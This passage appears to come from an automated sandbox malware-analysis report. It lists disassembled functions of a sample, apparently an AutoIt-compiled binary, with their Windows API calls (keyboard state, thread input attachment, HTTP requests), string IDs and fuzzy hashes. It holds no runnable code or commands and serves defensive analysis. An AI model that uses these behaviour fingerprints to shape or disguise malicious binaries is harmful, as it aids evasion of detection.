                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 14457aac3551c13488eb70d6bf8444f71044891b6a10c7745ec10cbcd3a83294
                                          • Instruction ID: b3b10fdcb41018e86916677144c8bdb6daa74826370e5d58a884ff2bed3c330a
                                          • Opcode Fuzzy Hash: 14457aac3551c13488eb70d6bf8444f71044891b6a10c7745ec10cbcd3a83294
                                          • Instruction Fuzzy Hash: CE411974D047C96DFF7B866488143F5BEA1AB5A300F08406ED6C54B5C1EBE499D4CF92
                                          Function 00128AA5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • CoInitialize.OLE32 ref: 00128AED
                                          • CoUninitialize.OLE32 ref: 00128AF8
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00143BBC,?), ref: 00128B58
                                          • IIDFromString.OLE32(?,?), ref: 00128BCB
                                          • VariantInit.OLEAUT32(?), ref: 00128C65
                                          • VariantClear.OLEAUT32(?), ref: 00128CC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: 1719d913dab03ef7983fe551bc4222910176f24937b4c70de6021256de068319
                                          • Instruction ID: ae78237b814db2a89bddf278c4ca017a7a213534d545a29b92c6f6579647a106
                                          • Opcode Fuzzy Hash: 1719d913dab03ef7983fe551bc4222910176f24937b4c70de6021256de068319
                                          • Instruction Fuzzy Hash: 0961B07060A7219FC714DF14E889FAAB7E8EF49714F00085DF9859B291DB70ED94CBA2
                                          Function 0011BB06 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0011BB13
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0011BB89
                                          • GetLastError.KERNEL32 ref: 0011BB93
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0011BC00
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: 4748c39502092008426a306b1b4328402a4c144bc3786a09e29650a0619af291
                                          • Instruction ID: 0095e3a39289d177948d6320cea50951e77a8aaacc50e2d4d906b018c2f40118
                                          • Opcode Fuzzy Hash: 4748c39502092008426a306b1b4328402a4c144bc3786a09e29650a0619af291
                                          • Instruction Fuzzy Hash: 1A31C035A08209AFCB18DF64C8C5EEDB7B8EF49300F108029E905D76D6DB709A81CB55
                                          Function 00109B47 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00109BCC
                                          • GetDlgCtrlID.USER32 ref: 00109BD7
                                          • GetParent.USER32 ref: 00109BF3
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00109BF6
                                          • GetDlgCtrlID.USER32(?), ref: 00109BFF
                                          • GetParent.USER32(?), ref: 00109C1B
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00109C1E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: a2fe2165f7e87c4bf09a6985ffc1f31e8c5b0fb653cb0b0c85bcc232f8b7130e
                                          • Instruction ID: 5ddb1e0704ebc8b4d27e459b25806010986432eccad3aba755c02467a8ca7d42
                                          • Opcode Fuzzy Hash: a2fe2165f7e87c4bf09a6985ffc1f31e8c5b0fb653cb0b0c85bcc232f8b7130e
                                          • Instruction Fuzzy Hash: D921F1B5901104AFDF04EB61CC95EFEBBB4EF9A310F000155F9A2932E2DBB489259A20
                                          Function 00109C32 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                            • Part of subcall function 0010B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0010B7BD
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00109CB5
                                          • GetDlgCtrlID.USER32 ref: 00109CC0
                                          • GetParent.USER32 ref: 00109CDC
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00109CDF
                                          • GetDlgCtrlID.USER32(?), ref: 00109CE8
                                          • GetParent.USER32(?), ref: 00109D04
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 00109D07
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$ClassName_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 1536045017-1403004172
                                          • Opcode ID: 3cd5c7a563530705486b5dfc2f58a3099f057e42163c4fd65d6f6994e2583c99
                                          • Instruction ID: f749797663f58f4050e164fccc5fd5edd8d900fac6bf939814e56e7d35a98781
                                          • Opcode Fuzzy Hash: 3cd5c7a563530705486b5dfc2f58a3099f057e42163c4fd65d6f6994e2583c99
                                          • Instruction Fuzzy Hash: 2121D3B5D41104BBDF05EBA1CC95EFEBBB9EF95300F100015F992931E2DB7589659B20
                                          Function 00109D1B Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetParent.USER32 ref: 00109D27
                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00109D3C
                                          • _wcscmp.LIBCMT ref: 00109D4E
                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00109DC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameParentSend_wcscmp
                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                          • API String ID: 1704125052-3381328864
                                          • Opcode ID: 311af0fd7b56d027c643dadf11ebd7f45b7f75e0ddf7abae0cbaf5f5b186a28a
                                          • Instruction ID: 0f627d8150f6a15a80a96536d88f1cba71328930803e1ae7ea5e3a4d483c99e1
                                          • Opcode Fuzzy Hash: 311af0fd7b56d027c643dadf11ebd7f45b7f75e0ddf7abae0cbaf5f5b186a28a
                                          • Instruction Fuzzy Hash: FC1106BA289317BAF6056660EC27DE7739CDF05360B200017FA41A40E3FBE56A615A66
                                          Function 00128F95 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • VariantInit.OLEAUT32(?), ref: 00128FC1
                                          • CoInitialize.OLE32(00000000), ref: 00128FEE
                                          • CoUninitialize.OLE32 ref: 00128FF8
                                          • GetRunningObjectTable.OLE32(00000000,?), ref: 001290F8
                                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00129225
                                          • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00143BDC), ref: 00129259
                                          • CoGetObject.OLE32(?,00000000,00143BDC,?), ref: 0012927C
                                          • SetErrorMode.KERNEL32(00000000), ref: 0012928F
                                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0012930F
                                          • VariantClear.OLEAUT32(?), ref: 0012931F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                          • String ID:
                                          • API String ID: 2395222682-0
                                          • Opcode ID: ca3acc65149295eebf6a0a6bc6009b49949ec48cb880b88c5c3899ceb5629a6f
                                          • Instruction ID: 346cf44d9926caec516ac479239d9f622098119f9ae979601e7b604dc4e9b985
                                          • Opcode Fuzzy Hash: ca3acc65149295eebf6a0a6bc6009b49949ec48cb880b88c5c3899ceb5629a6f
                                          • Instruction Fuzzy Hash: B9C146B1608315AFC700DF69D88496BB7E9FF89308F00495DF98A9B261DB71ED05CB92
                                          Function 001119CD Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 001119EF
                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111A03
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 00111A0A
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A19
                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00111A2B
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A44
                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00110A67,?,00000001), ref: 00111A56
                                          • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111A9B
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111AB0
                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00110A67,?,00000001), ref: 00111ABB
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: f08ad775ba27f9d07538a73119db02bc4be0fcd3a3f04183f4aeef585e8cd035
                                          • Instruction ID: 3100e4507a3397d79a5f6fd2e1d1305611a1cb7bc0467e982b7d06878d5c937d
                                          • Opcode Fuzzy Hash: f08ad775ba27f9d07538a73119db02bc4be0fcd3a3f04183f4aeef585e8cd035
                                          • Instruction Fuzzy Hash: 1A310E35241244BFEB199F10EC48BA9BBBAFF59305F114525FA09C35A0CBB09DC08B60
                                          Function 000EC0E3 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetSysColor.USER32(00000008), ref: 000B260D
                                          • SetTextColor.GDI32(?,000000FF), ref: 000B2617
                                          • SetBkMode.GDI32(?,00000001), ref: 000B262C
                                          • GetStockObject.GDI32(00000005), ref: 000B2634
                                          • GetClientRect.USER32(?), ref: 000EC0FC
                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 000EC113
                                          • GetWindowDC.USER32(?), ref: 000EC11F
                                          • GetPixel.GDI32(00000000,?,?), ref: 000EC12E
                                          • ReleaseDC.USER32(?,00000000), ref: 000EC140
                                          • GetSysColor.USER32(00000005), ref: 000EC15E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                          • String ID:
                                          • API String ID: 3430376129-0
                                          • Opcode ID: cda9dd9e67d202e6397f13c0a8426ba500bf3c31984690c78a60aefbcb386bde
                                          • Instruction ID: 52f5c40556597450d19349b4cb6df3bf9704372600000bd6ecd60e15e66260cc
                                          • Opcode Fuzzy Hash: cda9dd9e67d202e6397f13c0a8426ba500bf3c31984690c78a60aefbcb386bde
                                          • Instruction Fuzzy Hash: 17117C35500244BFEB625FA5EC08BE97BB1EB0A721F104265FB6A954F1CB324991EF10
                                          Function 000BAD98 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000BADE1
                                          • OleUninitialize.OLE32(?,00000000), ref: 000BAE80
                                          • UnregisterHotKey.USER32(?), ref: 000BAFD7
                                          • DestroyWindow.USER32(?), ref: 000F2F64
                                          • FreeLibrary.KERNEL32(?), ref: 000F2FC9
                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F2FF6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                          • String ID: close all
                                          • API String ID: 469580280-3243417748
                                          • Opcode ID: a73203a743ec0036c645400b22ca0e857159d76a1982273bc9d152447bf1583a
                                          • Instruction ID: 94de4673404eb990f94933da7d2f4e6389f6df722417f3c10d2e9bfe8c3bbab2
                                          • Opcode Fuzzy Hash: a73203a743ec0036c645400b22ca0e857159d76a1982273bc9d152447bf1583a
                                          • Instruction Fuzzy Hash: 9AA17A307012128FCB69EF50C4A5BBDF7A4AF05710F5042ADE90AAB662CB31ED56CF91
                                          Function 0010AD69 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumChildWindows.USER32(?,0010B13A), ref: 0010B078
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ChildEnumWindows
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 3555792229-1603158881
                                          • Opcode ID: 626624539c304e5520aa624a0b5bbfae4c92479323f148a063b3a21073b52b18
                                          • Instruction ID: 4ec4a938d52f93c5928e95fa3eee9088f37e23350c6abf116a176feb59cbae4e
                                          • Opcode Fuzzy Hash: 626624539c304e5520aa624a0b5bbfae4c92479323f148a063b3a21073b52b18
                                          • Instruction Fuzzy Hash: B891A870504706DADB18EF60C481BEEFB75FF14300F94811AE99AA72D2DF706959CBA1
                                          Function 000B31F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowLongW.USER32(?,000000EB), ref: 000B327E
                                            • Part of subcall function 000B218F: GetClientRect.USER32(?,?), ref: 000B21B8
                                            • Part of subcall function 000B218F: GetWindowRect.USER32(?,?), ref: 000B21F9
                                            • Part of subcall function 000B218F: ScreenToClient.USER32(?,?), ref: 000B2221
                                          • GetDC.USER32 ref: 000ED073
                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000ED086
                                          • SelectObject.GDI32(00000000,00000000), ref: 000ED094
                                          • SelectObject.GDI32(00000000,00000000), ref: 000ED0A9
                                          • ReleaseDC.USER32(?,00000000), ref: 000ED0B1
                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000ED13C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                          • String ID: U
                                          • API String ID: 4009187628-3372436214
                                          • Opcode ID: 76a3565eac45a75a2409e05c4f9ce11dfa63cb0659e1e03eb4267354646381f6
                                          • Instruction ID: bee7b10c12d142bf017ce766154ef9a0059ecae482903ecb33fba8adf863b96e
                                          • Opcode Fuzzy Hash: 76a3565eac45a75a2409e05c4f9ce11dfa63cb0659e1e03eb4267354646381f6
                                          • Instruction Fuzzy Hash: 1C71D330504245EFCF61CF65C884AEE7BF5FF49360F2842AAED556A2A6C7318D81DB60
                                          Function 0013C634 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                            • Part of subcall function 000B2714: GetCursorPos.USER32(?), ref: 000B2727
                                            • Part of subcall function 000B2714: ScreenToClient.USER32(001777B0,?), ref: 000B2744
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000001), ref: 000B2769
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000002), ref: 000B2777
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0013C69C
                                          • ImageList_EndDrag.COMCTL32 ref: 0013C6A2
                                          • ReleaseCapture.USER32 ref: 0013C6A8
                                          • SetWindowTextW.USER32(?,00000000), ref: 0013C752
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0013C765
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0013C847
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 1924731296-2107944366
                                          • Opcode ID: d22a2fc44dd18651062f64ce7b124d402cfd88865dd28a037dc9f2cf6ad29cee
                                          • Instruction ID: 8fca6f18875f14e673db45dd555bc80bce3358af2495e074ccc03eedf64b867a
                                          • Opcode Fuzzy Hash: d22a2fc44dd18651062f64ce7b124d402cfd88865dd28a037dc9f2cf6ad29cee
                                          • Instruction Fuzzy Hash: 03518D70108304AFD714EF14CC5AFAA7BF5EB88310F10851DF999972E2CB70A995CB92
                                          Function 001220E1 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012211C
                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00122148
                                          • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0012218A
                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0012219F
                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001221AC
                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001221DC
                                          • InternetCloseHandle.WININET(00000000), ref: 00122223
                                            • Part of subcall function 00122B4F: GetLastError.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B64
                                            • Part of subcall function 00122B4F: SetEvent.KERNEL32(?,?,00121EE3,00000000,00000000,00000001), ref: 00122B79
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                          • String ID:
                                          • API String ID: 2603140658-3916222277
                                          • Opcode ID: a3f7e06da839b0e08d1e24d48116d59603c1711a0e336add5b8c0e8cfdb5c3ae
                                          • Instruction ID: 5ed6af1e3ddc3be799fc638edaffa61073cd18a135676b273090a2dc3eec67b0
                                          • Opcode Fuzzy Hash: a3f7e06da839b0e08d1e24d48116d59603c1711a0e336add5b8c0e8cfdb5c3ae
                                          • Instruction Fuzzy Hash: 50419DB5500228BFEB129F60DC89FBF7BACEF09354F004116FA049A151DB759E64CBA1
                                          Function 00129330 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00140980), ref: 00129412
                                          • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00140980), ref: 00129446
                                          • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 001295C0
